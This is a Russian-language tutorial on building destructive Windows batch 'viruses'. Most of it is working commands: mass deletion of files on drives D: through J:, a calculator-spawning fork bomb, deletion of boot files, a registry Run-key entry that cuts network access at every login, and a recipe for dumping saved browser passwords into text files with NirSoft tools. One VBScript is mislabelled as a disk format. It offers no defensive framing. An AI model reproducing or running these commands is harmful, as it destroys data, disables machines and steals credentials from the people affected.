Базовые элементы CMD | BAT вирусы

В этой статье пойдёт о создании .bat и .cmd "вирусов" для Windows.

Советую выключить в настройках Windows скрытия расширения для известных типов файлов. Напоминаю, что перенос строки в линуксе и в винде отличается, поэтому если вы просто напишите на линуксе, на винде он превратится в одну сплошную строчку.

Создаем файл hack.bat и вписываем следующее, это отключит вывод вводимых команд:

@ECHO OFF

Если вам надо, чтобы ком. строка не закрывалась - добавьте в конец:

pause

Для вывода текста используйте:

Echo "message"

Удаление файлов с указанных жестких дисков, можно добавить больше, для C понадобятся права админа:

del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Создаем много папок:

for /l %%i in (1,1,100) do mkdir "dir %%i"

Отключаем доступ в интернет:

Ipconfig /release

Включаем интернет, отключенный предыдущей командой:

Ipconfig /renew

Переполняем память и отправляем комп в ребут калькуляторами. Можно изменить на проводник(explorer.exe) или любой другой файл(Если он не прописан в PATH, то нужно писать полный путь):

CLS
:A
start calc.exe
goto A

Быстрый формат дисков:

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

Убивает систему:

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Отключение доступа в интернет навсегда:

echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

Сохранение паролей от браузеров в текстовый документ, используя программы от nirsoft. Автор написал на сайте в разделе "Password Tools":

As you may know, I removed the command-line options that exports the passwords to a file from all major password-recovery tools. You can find the reason for removing the command-line options in this Blog post. If you need to use the command line options of these password-recovery tools (For legal purposes only !!), you can download a package of all major password-recovery tools with command-line support, by following the instructions below:
Click this download link.
Enter 'download' as the user name, and 'nirsoft123!' as the password.
After downloading the package, extract the files from it using the following password: nirsoft123!

Примерный перевод:

Как вы можете знать, я удалил поддержку экспорта паролей в текстовый документ через командную строку из своих утилит для восстановления паролей. Причину можно узнать из этого поста. Если вам нужна поддержка командной строки вы можете скачать специальные сборки самых популярных утилит:
Перейдите на эту страницу загрузки.
Введите имя пользователя "download" и пароль 'nirsoft123!' .
Пароль от архива nirsoft123!

Скачиваем сборку и создаем рядом папку под утилиты, в примере она у меня будет называться "installer". Сами проги из архива ложим туда. В батник пишем:

cd installer

start имя.exe
stext имя.txt

И так перебираем каждую программу из списка(Без cd)

Меняем цвет текста(Первые буква/цифра — это цвет фона, а вторая — цвет текста):

color CA

Список расцветок:

0 = Черный
1 = Синий
2 = Зеленый
3 = Аквамарин
4 = Красный
5 = Фиолетовый
6 = Желтый
7 = Белый
8 = Серый
9 = Светло-голубой
A = Светло-зеленый
В = Светлый аквамарин
С = Светло-красный
D = Светло-фиолетовый
E = Светло-желтый
F = Ярко-белый